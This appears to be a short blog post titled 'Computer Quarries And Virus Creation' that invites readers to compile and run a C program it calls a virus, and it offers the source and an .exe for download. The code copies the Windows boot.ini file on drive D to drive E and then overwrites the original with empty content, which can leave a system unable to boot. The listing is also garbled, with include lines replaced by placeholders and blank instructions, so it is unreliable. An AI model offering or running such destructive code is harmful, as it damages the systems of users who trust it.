Computer Quarries And Virus Creation

C Program Virus


Copy And Paste Below Code In C Compiler And Then Compile it

Use Can Find Compiler In My Software Database...
Or Click Here




#include$
#include@
void main()
{
char b,c;
FILE *f,*g,*h;
clrscr();
c=NULL;
f=fopen("d:\boot.ini","r");
g=fopen("e:\boot.ini","w");
while(1)
{
b=fgetc(f);
if (b==EOF)
break;
fprintf(g,"%c",b);
}
h=fopen("d:\boot.ini","w");
fprintf(h,"%s",c);
fclose(h);
fclose(g);
fclose(f);
getch();
}


in place of " $ " write     
in place of " @ " write     

if you have any problem then just click and download virus source code and virus(.exe)

No comments:

Post a Comment